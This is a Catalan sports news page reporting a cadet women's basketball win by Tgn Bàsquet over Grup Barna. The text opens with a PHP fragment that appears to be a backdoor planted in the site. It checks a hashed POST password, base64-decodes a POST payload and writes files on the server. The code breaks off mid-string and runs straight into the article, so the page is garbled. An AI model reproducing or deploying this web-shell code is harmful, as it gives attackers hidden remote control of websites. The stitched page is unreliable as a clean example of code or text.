function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05 A s'aferra a la defensa, tomba el Grup Barna i encara té possibilitats de permanència (39-44) - Tgn Bàsquet Club -

El Cadet femení 05 A s’aferra a la defensa, tomba el Grup Barna i encara té possibilitats de permanència (39-44)

Updated: abril 4, 2021

L’equip Cadet femení 05 A continua amb vida en la fase de permanència de Preferent A. El conjunt que entrena Albert del Rey ha derrotat el Grup Barna aquest migdia i es jugarà seguir a l’elit del bàsquet femení en categoria cadet aquesta tarda contra el Basket Almeda (19 h). El TGN Bàsquet ha jugat amb més intensitat que ahir en què va ser superat des de l’inici pel Joventut de Badalona Femení. Les jugadores tarragonines han tingut molts problemes per anotar. No ha estat una qüestió de no trobar bones posicions de tir, sinó de no encertar en el llançament, sempre alliberat. Així, i en un primer quart de desencert general, el marcador ha mostrat un parcial de 4-6.

En el segon quart, el TGN Bàsquet s’ha mostrat més sòlid. La defensa pressionant de les liles ha permès recuperar moltes pilotes i les tarragonines han obert una escletxa en el marcador (7-15 a 5:21 pel descans). Amb tot, les errades en el tir exterior no han permès les jugadores d’Albert del Rey aconseguir més avantatge i a la mitja part el resultat era de 15-19.

El partit ha canviat en la segona meitat. El Grup Barna ha sortit més fort i ha capgirat el marcador de seguida gràcies a un triple i un tir lliure (19-19). S’ha entrat en una fase de poc encert, de molta defensa per part dels dos equips (les barcelonines han instal·lat una defensa en zona) i els punts entraven en comptagotes. Així ,el TGN Bàsquet, que només ha fet 4 punts en aquest període, ha vist com el seu rival aconseguia un petit avantatge de 3 punts (26-23 a 2:44 del final del quart) que, vist el ritme d’anotació del matx, semblava una bona renda. Al final del període, 26-23.

Però, inesperadament, les jugadores tarragonines han despertat en l’últim quart. Malgrat un altre bon inici del Grup Barna, 29-25 a 7:28 pel final del partit, la inspiració ofensiva de Farell —un altre dia la jugadora amb les idees més clares de cara a cistella— i de Navarro —màxima encistelladora contra el Joventut—, han donat la volta al partit (34-38, 4:04 pel final del matx), tot i la resistència de les barcelonines. Aquests flaixos de talent ofensiu —per fi han entrat els tirs des del perímetre— i la consistència defensiva permeten el TGN Bàsquet mantenir l’esperança de permanència, tot i que l’últim rival serà el poderós Almeda.